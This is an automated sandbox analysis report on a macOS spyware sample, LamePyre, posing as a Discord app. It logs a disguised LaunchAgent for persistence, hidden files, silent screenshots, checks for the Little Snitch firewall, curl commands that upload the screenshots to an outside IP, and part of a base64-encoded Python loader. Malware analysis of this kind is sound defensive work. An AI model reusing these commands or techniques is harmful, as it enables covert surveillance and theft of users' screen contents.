Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report Pe7niErK6B

Overview

General Information

Joe Sandbox Version:25.0.0
Analysis ID:65585
Start date:12.12.2018
Start time:11:23:26
Joe Sandbox Product:Cloud
Overall analysis duration:0h 11m 37s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Pe7niErK6B (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal76.troj.spyw.evad.macAPP@0/34@0/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many READ_NOCANCEL calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold760 - 100Report FP / FNfalsemalicious

Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface1Hidden Files and Directories1Launch Daemon2Masquerading1Credential DumpingProcess Discovery11Application Deployment SoftwareScreen Capture2Data CompressedUncommonly Used Port1
Replication Through Removable MediaScripting31Launch Daemon2Accessibility FeaturesHidden Files and Directories1Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol11
Drive-by CompromiseWindows Management InstrumentationLaunch Agent4Path InterceptionScripting31Input CaptureSystem Information Discovery31Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol

Signature Overview

Click to jump to signature section


Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.0.50:49243 -> 37.1.221.204:8080
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.212
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.212
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204
Source: unknownTCP traffic detected without corresponding DNS query: 37.1.221.204

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Detected macOS LamePyre spywareShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)IOC file dropped: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to dropped file
Captures screenshots with shell command 'screencapture'Show sources
Source: /bin/bash (PID: 584)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 587)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 594)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 599)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 605)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 612)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 614)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 621)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 628)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 630)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 637)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 639)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 646)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 649)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 655)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 662)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 664)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 671)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 678)Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Explicitly creates screenshots silently (i.e. without playing sounds)Show sources
Source: /bin/bash (PID: 584)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 587)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 594)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 599)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 605)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 612)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 614)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 621)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 628)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 630)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 637)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 639)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 646)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 649)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 655)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 662)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 664)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 671)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior
Source: /bin/bash (PID: 678)Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.pngJump to behavior

System Summary:

barindex
Writes Python scripts without typical Python file extensionsShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Python file created: /Users/henry/.system/.systemkeeperJump to dropped file
Classification labelShow sources
Source: classification engineClassification label: mal76.troj.spyw.evad.macAPP@0/34@0/0

Persistence and Installation Behavior:

barindex
Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)Show sources
Source: /bin/sh (PID: 572)Shell process: mkdir -p /Users/henry/.systemJump to behavior
Source: /bin/sh (PID: 573)Shell process: mkdir -p /Users/henry/Library/LaunchAgentsJump to behavior
Source: /bin/sh (PID: 574)Shell process: launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior
Source: /bin/sh (PID: 578)Shell process: ps -efJump to behavior
Source: /bin/sh (PID: 580)Shell process: grep Little SnitchJump to behavior
Source: /bin/sh (PID: 581)Shell process: grep -v grepJump to behavior
Source: /bin/sh (PID: 579)Shell process: ps -efJump to behavior
Source: /bin/sh (PID: 582)Shell process: grep Little SnitchJump to behavior
Source: /bin/sh (PID: 583)Shell process: grep -v grepJump to behavior
Source: /bin/sh (PID: 591)Shell process: ps -ef
Source: /bin/sh (PID: 592)Shell process: grep Little Snitch
Source: /bin/sh (PID: 593)Shell process: grep -v grep
Source: /bin/sh (PID: 601)Shell process: ps -ef
Source: /bin/sh (PID: 602)Shell process: grep Little Snitch
Source: /bin/sh (PID: 603)Shell process: grep -v grep
Source: /bin/sh (PID: 609)Shell process: ps -ef
Source: /bin/sh (PID: 610)Shell process: grep Little Snitch
Source: /bin/sh (PID: 611)Shell process: grep -v grep
Source: /bin/sh (PID: 618)Shell process: ps -ef
Source: /bin/sh (PID: 619)Shell process: grep Little Snitch
Source: /bin/sh (PID: 620)Shell process: grep -v grep
Source: /bin/sh (PID: 625)Shell process: ps -ef
Source: /bin/sh (PID: 626)Shell process: grep Little Snitch
Source: /bin/sh (PID: 627)Shell process: grep -v grep
Source: /bin/sh (PID: 634)Shell process: ps -ef
Source: /bin/sh (PID: 635)Shell process: grep Little Snitch
Source: /bin/sh (PID: 636)Shell process: grep -v grep
Source: /bin/sh (PID: 643)Shell process: ps -ef
Source: /bin/sh (PID: 644)Shell process: grep Little Snitch
Source: /bin/sh (PID: 645)Shell process: grep -v grep
Source: /bin/sh (PID: 651)Shell process: ps -ef
Source: /bin/sh (PID: 652)Shell process: grep Little Snitch
Source: /bin/sh (PID: 653)Shell process: grep -v grep
Source: /bin/sh (PID: 659)Shell process: ps -ef
Source: /bin/sh (PID: 660)Shell process: grep Little Snitch
Source: /bin/sh (PID: 661)Shell process: grep -v grep
Source: /bin/sh (PID: 668)Shell process: ps -ef
Source: /bin/sh (PID: 669)Shell process: grep Little Snitch
Source: /bin/sh (PID: 670)Shell process: grep -v grep
Source: /bin/sh (PID: 675)Shell process: ps -ef
Source: /bin/sh (PID: 676)Shell process: grep Little Snitch
Source: /bin/sh (PID: 677)Shell process: grep -v grep
Uploads files by using the "curl" command and emulating a filled-in formShow sources
Source: /bin/bash (PID: 586)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 588)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 595)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 604)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 606)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 613)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 615)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 622)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 629)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 631)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 638)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 640)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 647)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 654)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 656)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 663)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 665)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 672)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 679)Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Hidden file created: /Users/henry/.system/.helperJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)Hidden file created: /Users/henry/.system/.systemkeeperJump to behavior
Source: /usr/sbin/screencapture (PID: 584)Hidden file created: /tmp/.alloy.png-bSGCJump to behavior
Source: /usr/sbin/screencapture (PID: 587)Hidden file created: /tmp/.alloy.png-fVAsJump to behavior
Source: /usr/sbin/screencapture (PID: 594)Hidden file created: /tmp/.alloy.png-trDyJump to behavior
Source: /usr/sbin/screencapture (PID: 599)Hidden file created: /tmp/.alloy.png-CiotJump to behavior
Source: /usr/sbin/screencapture (PID: 605)Hidden file created: /tmp/.alloy.png-JwlgJump to behavior
Source: /usr/sbin/screencapture (PID: 612)Hidden file created: /tmp/.alloy.png-OKVgJump to behavior
Source: /usr/sbin/screencapture (PID: 614)Hidden file created: /tmp/.alloy.png-0JUkJump to behavior
Source: /usr/sbin/screencapture (PID: 621)Hidden file created: /tmp/.alloy.png-ScvrJump to behavior
Source: /usr/sbin/screencapture (PID: 628)Hidden file created: /tmp/.alloy.png-3tBvJump to behavior
Source: /usr/sbin/screencapture (PID: 630)Hidden file created: /tmp/.alloy.png-9exNJump to behavior
Source: /usr/sbin/screencapture (PID: 637)Hidden file created: /tmp/.alloy.png-NqNkJump to behavior
Source: /usr/sbin/screencapture (PID: 639)Hidden file created: /tmp/.alloy.png-MR2YJump to behavior
Source: /usr/sbin/screencapture (PID: 646)Hidden file created: /tmp/.alloy.png-8UHLJump to behavior
Source: /usr/sbin/screencapture (PID: 649)Hidden file created: /tmp/.alloy.png-lIjKJump to behavior
Source: /usr/sbin/screencapture (PID: 655)Hidden file created: /tmp/.alloy.png-whQ4Jump to behavior
Source: /usr/sbin/screencapture (PID: 662)Hidden file created: /tmp/.alloy.png-WEFKJump to behavior
Source: /usr/sbin/screencapture (PID: 664)Hidden file created: /tmp/.alloy.png-Idi5Jump to behavior
Source: /usr/sbin/screencapture (PID: 671)Hidden file created: /tmp/.alloy.png-ykTwJump to behavior
Source: /usr/sbin/screencapture (PID: 678)Hidden file created: /tmp/.alloy.png-17crJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)Shell command executed: /bin/bash -c PAYLOAD_DATA='IyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KCmltcG9ydCBiYXNlNjQKaW1wb3J0IGxvZ2dpbmcKaW1wb3J0IG9zCmltcG9ydCBzdWJwcm9jZXNzCmZyb20gc3lzIGltcG9ydCBleGl0CmZyb20gdGV4dHdyYXAgaW1wb3J0IGRlZGVudAoKCkxPQURFUl9PUFRJT05TID0gewogICAgImxhdW5jaF9hZ2VudF9uYW1lIjogImNvbS5hcHBsZS5zeXN0ZW1rZWVwZXIiLAogICAgInBheWxvYWRfZmlsZW5hbWUiOiAiLnN5c3RlbWtlZXBlciIsCiAgICAicHJvZ3JhbV9kaXJlY3RvcnkiOiBvcy5wYXRoLmV4cGFuZHVzZXIoIn4vLnN5c3RlbSIpCn0KUEFZTE9BRF9CQVNFNjQgPSAiSXlFdmRYTnlMMkpwYmk5d2VYUm9iMjRLQ21sdGNHOXlkQ0J6ZVhNc1ltRnpaVFkwTzJWNFpXTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTZ25ZMVpDZFZWVlJtRmtNa3A0VVd4dk9Vb3hRa05pU0VaS1ZtbGpTMkZYTVhkaU0wb3dTVWhPTldONWQyZGtXRXB6WWtkc2FVMXFkSEJpV0VKMlkyNVJaMk50VlhOSlNFNHhXVzVDZVdJeVRteGpNMDAzV1RJeGEwbEVNR2RKYmtKNlNVTXhiRnBwUWpoSlIyUjVXbGhCWjFSSGJEQmtSM2hzV0VOQ1ZHSnRiREJaTW1kblprTkNibU50Vm5kSlF6RXlTVWRrZVZwWVFXbERia0o2U1VRd1oyTXpWbWxqU0VwMldUSldlbU41TlZGaU0wSnNZbWxvYW1KWFVYTkpTRTV2V2xkNGMxQldVbmxrVjFWelNVaE9NRnBIT1RGa1JERjZaRmRLZDJOdE9XcGFXRTU2VEd4Q1NsVkZWWEJEYlRreFpFTkJPVWxJUW5wTWJrNHdXa2M1TVdSRE5YbGJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 572)Shell command executed: /bin/sh -c mkdir -p /Users/henry/.systemJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 573)Shell command executed: /bin/sh -c mkdir -p /Users/henry/Library/LaunchAgentsJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 574)Shell command executed: /bin/sh -c launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 576)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grepJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 577)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grepJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 590)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 600)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 608)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 617)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 624)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 633)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 642)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 650)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 658)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 667)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /bin/bash (PID: 586)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 588)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 595)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 604)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 606)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 613)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 615)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 622)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 629)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 631)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 638)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 640)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 647)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 654)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 656)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 663)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 665)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 672)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
Source: /bin/bash (PID: 679)Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85CJump to behavior
